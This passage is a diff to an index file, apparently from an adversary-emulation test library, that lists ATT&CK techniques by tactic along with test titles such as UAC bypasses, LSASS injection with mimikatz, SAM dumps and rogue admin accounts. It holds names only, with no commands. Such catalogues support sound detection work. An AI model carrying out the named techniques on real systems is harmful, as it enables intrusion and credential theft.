@@ -397,6 +10,8 @@ - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1552.007 Container API](../../T1552.007/T1552.007.md) + - Atomic Test #1: ListSecrets [macos, linux] - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] - T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -419,6 +34,7 @@ - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md) - Atomic Test #1: AppleScript - Prompt User for Password [macos] - Atomic Test #2: PowerShell - Prompt User for Password [windows] @@ -476,6 +92,7 @@ - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md) - Atomic Test #1: Brute Force Credentials of all domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) [windows] +- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md) - Atomic Test #1: Password Spray all Domain Users [windows] - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows] 
@@ -487,6 +104,7 @@ - Atomic Test #3: Copy Private SSH Keys with CP [linux] - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux] - T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md) - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows] - Atomic Test #2: Registry parse with pypykatz [windows] @@ -499,7 +117,9 @@ - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1555.004 Windows Credential Manager [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # collection - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -574,6 +194,203 @@ - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +# privilege-escalation +- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) + - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] +- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) + - Atomic Test #1: Install AppInit Shim [windows] +- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md) + - Atomic Test #1: Application Shim Installation [windows] + - Atomic Test #2: New shim database files created in the default shim database directory [windows] + - Atomic Test #3: Registry key creation and/or modification events for SDB [windows] +- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md) + - Atomic Test #1: Process Injection via C# [windows] +- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) + - Atomic Test #1: At - Schedule a job [linux] +- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md) + - Atomic Test #1: At.exe Scheduled task [windows] +- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) + - Atomic Test #1: Bypass UAC using Event Viewer 
(cmd) [windows] + - Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows] + - Atomic Test #3: Bypass UAC using Fodhelper [windows] + - Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows] + - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] + - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] + - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] + - Atomic Test #8: Disable UAC using reg.exe [windows] +- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) + - Atomic Test #1: User scope COR_PROFILER [windows] + - Atomic Test #2: System Scope COR_PROFILER [windows] + - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] +- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) + - Atomic Test #1: Change Default File Association [windows] +- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] +- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) + - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] +- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) + - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] 
+- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] +- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) + - Atomic Test #1: Process Injection via mavinject.exe [windows] +- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.014 Emond](../../T1546.014/T1546.014.md) + - Atomic Test #1: Persistance with Event Monitor - emond [macos] +- T1611 Escape to Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) + - Atomic Test #1: IFEO Add Debugger [windows] + - Atomic Test #2: IFEO Global Flags [windows] +- [T1547.006 Kernel 
Modules and Extensions](../../T1547.006/T1547.006.md) + - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] +- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) + - Atomic Test #1: Launch Agent [macos] +- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) + - Atomic Test #1: Launch Daemon [macos] +- [T1053.004 Launchd](../../T1053.004/T1053.004.md) + - Atomic Test #1: Event Monitor Daemon Persistence [macos] +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] +- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) + - Atomic Test #1: Logon Scripts - Mac [macos] +- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) + - Atomic Test #1: Logon Scripts [windows] +- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) + - Atomic Test #1: Netsh Helper DLL Registration [windows] +- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) + - Atomic Test #1: Parent PID Spoofing using PowerShell [windows] + - Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows] + - Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows] + - Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows] + - Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows] +- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.008 Path Interception by Search Order Hijacking 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) + - Atomic Test #1: Execution of program.exe as service with unquoted service path [windows] +- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md) + - Atomic Test #1: Plist Modification [macos] +- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md) + - Atomic Test #1: Add Port Monitor persistence in Registry [windows] +- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md) + - Atomic Test #1: Append malicious start-process cmdlet [windows] +- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md) + - Atomic Test #1: Process Hollowing using PowerShell [windows] + - Atomic Test #2: RunPE via VBA [windows] +- [T1055 Process Injection](../../T1055/T1055.md) + - Atomic Test #1: Shellcode execution via VBA [windows] + - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] +- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #1: rc.common [macos] +- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) + - Atomic Test #1: Re-Opened Applications [macos] + - Atomic Test #2: Re-Opened Applications [macos] +- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) + - Atomic Test #1: Reg Key Run [windows] + - Atomic Test #2: Reg Key RunOnce [windows] + - Atomic Test #3: PowerShell Registry RunOnce [windows] + - Atomic Test #4: Suspicious vbs file run from startup Folder [windows] + - Atomic 
Test #5: Suspicious jse file run from startup Folder [windows] + - Atomic Test #6: Suspicious bat file run from startup Folder [windows] + - Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows] +- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) + - Atomic Test #1: Scheduled Task Startup Script [windows] + - Atomic Test #2: Scheduled task Local [windows] + - Atomic Test #3: Scheduled task Remote [windows] + - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows] + - Atomic Test #5: Task Scheduler via VBA [windows] + - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows] +- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.002 Screensaver](../../T1546.002/T1546.002.md) + - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows] +- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md) + - Atomic Test #1: Modify SSP configuration in registry [windows] +- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) + - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] +- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) + - Atomic Test #1: Make and modify binary from C source [macos, linux] + - Atomic Test #2: Set a SetUID flag on file [macos, linux] + - Atomic Test #3: Set a SetGID flag on file [macos, linux] +- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) + - Atomic Test #1: Shortcut Modification [windows] + - Atomic Test #2: Create shortcut to cmd in startup folders [windows] +- [T1037.005 Startup Items](../../T1037.005/T1037.005.md) + - Atomic Test #1: Add file to Local Library StartupItems [macos] +- [T1548.003 Sudo and Sudo 
Caching](../../T1548.003/T1548.003.md) + - Atomic Test #1: Sudo usage [macos, linux] + - Atomic Test #2: Unlimited sudo cache timeout [macos, linux] + - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux] +- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md) + - Atomic Test #1: Create Systemd Service [linux] +- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md) + - Atomic Test #1: Create Systemd Service and Timer [linux] +- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md) + - Atomic Test #1: Named pipe client impersonation [windows] + - Atomic Test #2: `SeDebugPrivilege` token duplication [windows] +- [T1546.005 Trap](../../T1546.005/T1546.005.md) + - Atomic Test #1: Trap [macos, linux] +- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) + - Atomic Test #1: Add command to .bash_profile [macos, linux] + - Atomic Test #2: Add command to .bashrc [macos, linux] +- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) + - Atomic Test #1: Persistence via WMI Event Subscription [windows] +- [T1543.003 Windows Service](../../T1543.003/T1543.003.md) + - Atomic Test #1: Modify Fax service to run PowerShell [windows] + - Atomic Test #2: Service Installation CMD [windows] + - Atomic Test #3: Service Installation PowerShell [windows] +- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md) + - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows] + - Atomic Test #2: Winlogon Userinit Key 
Persistence - PowerShell [windows] + - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] +- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) + # defense-evasion - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -588,6 +405,7 @@ - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md) - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux] - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1612 Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] - Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows] @@ -626,6 +444,7 @@ - Atomic Test #3: Clear Event Logs via VBA [windows] - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md) - Atomic Test #1: Compile After Delivery using csc.exe [windows] - Atomic Test #2: Dynamic C# Compile [windows] 
@@ -653,6 +472,7 @@ - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] - Atomic Test #2: Certutil Rename and Decode [windows] +- T1610 Deploy Container [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1006 Direct Volume Access](../../T1006/T1006.md) - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows] - T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -697,8 +517,13 @@ - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) - Atomic Test #1: Process Injection via mavinject.exe [windows] - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -721,7 +546,7 @@ - T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md) - Atomic Test #1: Gatekeeper Bypass [macos] -- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md) - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos] @@ -772,9 +597,6 @@ - Atomic Test #8: InstallUtil evasive invocation [windows] - T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1574.006 LD_PRELOAD](../../T1574.006/T1574.006.md) - - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] - - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] - [T1222.002 Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux] - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux] @@ -791,6 +613,7 @@ - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows] - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows] - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md) - Atomic Test #1: Creating W32Time similar named service using schtasks [windows] - Atomic Test #2: Creating W32Time similar named service using sc [windows] 
@@ -996,6 +819,215 @@ - Atomic Test #3: WMIC bypass using local XSL file [windows] - Atomic Test #4: WMIC bypass using remote XSL file [windows] +# persistence +- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) + - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] +- [T1098 Account Manipulation](../../T1098/T1098.md) + - Atomic Test #1: Admin Account Manipulate [windows] + - Atomic Test #2: Domain Account and Group Manipulate [windows] +- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) + - Atomic Test #1: Install AppInit Shim [windows] +- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md) + - Atomic Test #1: Application Shim Installation [windows] + - Atomic Test #2: New shim database files created in the default shim database directory [windows] + - Atomic Test #3: Registry key creation and/or modification events for SDB [windows] +- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md) + - Atomic Test #1: At - Schedule a job [linux] +- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md) + - Atomic Test #1: At.exe Scheduled task [windows] +- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1197 BITS Jobs](../../T1197/T1197.md) + - Atomic Test #1: Bitsadmin Download (cmd) [windows] + - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] + - Atomic Test #3: Persist, Download, & Execute [windows] + - Atomic Test #4: 
Bits download using desktopimgdownldr.exe (cmd) [windows] +- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1176 Browser Extensions](../../T1176/T1176.md) + - Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos] + - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] + - Atomic Test #3: Firefox [linux, windows, macos] + - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] +- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) + - Atomic Test #1: User scope COR_PROFILER [windows] + - Atomic Test #2: System Scope COR_PROFILER [windows] + - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] +- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) + - Atomic Test #1: Change Default File Association [windows] +- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md) + - Atomic Test #1: ListCronjobs [linux, macos] + - Atomic Test #2: CreateCronjob [linux, macos] +- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1053.003 Cron](../../T1053.003/T1053.003.md) + - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] + - Atomic Test 
#2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] +- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) + - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] +- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) + - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] +- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) + - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] +- [T1136.002 Domain Account](../../T1136.002/T1136.002.md) + - Atomic Test #1: Create a new Windows domain admin user [windows] + - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] + - Atomic Test #3: Create a new Domain Account using PowerShell [windows] +- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) + - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux] + - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux] +- [T1546.014 Emond](../../T1546.014/T1546.014.md) + - Atomic Test #1: Persistance with Event Monitor - emond [macos] +- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1133 External Remote Services](../../T1133/T1133.md) + - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] +- T1574 Hijack Execution Flow [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) +- T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) + - Atomic Test #1: IFEO Add Debugger [windows] + - Atomic Test #2: IFEO Global Flags [windows] +- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md) + - Atomic Test #1: Linux - Load Kernel Module via insmod [linux] +- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md) + - Atomic Test #1: Launch Agent [macos] +- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md) + - Atomic Test #1: Launch Daemon [macos] +- [T1053.004 Launchd](../../T1053.004/T1053.004.md) + - Atomic Test #1: Event Monitor Daemon Persistence [macos] +- [T1136.001 Local Account](../../T1136.001/T1136.001.md) + - Atomic Test #1: Create a user account on a Linux system [linux] + - Atomic Test #2: Create a user account on a MacOS system [macos] + - Atomic Test #3: Create a new user in a command prompt [windows] + - Atomic Test #4: Create a new user in PowerShell [windows] + - Atomic Test #5: Create a new user in Linux with `root` UID and GID. 
[linux] + - Atomic Test #6: Create a new Windows admin user [windows] +- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md) + - Atomic Test #1: Create local account with admin priviliges [windows] +- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md) + - Atomic Test #1: Logon Scripts - Mac [macos] +- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md) + - Atomic Test #1: Logon Scripts [windows] +- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md) + - Atomic Test #1: Netsh Helper DLL Registration [windows] +- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1137 Office Application Startup](../../T1137/T1137.md) + - Atomic Test #1: Office Application Startup - Outlook as a C2 [windows] +- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1137.002 Office Test](../../T1137.002/T1137.002.md) + - Atomic Test #1: Office Application Startup Test Persistence [windows] +- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md) + - Atomic Test #1: Install Outlook Home Page Persistence [windows] +- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1556.002 Password Filter 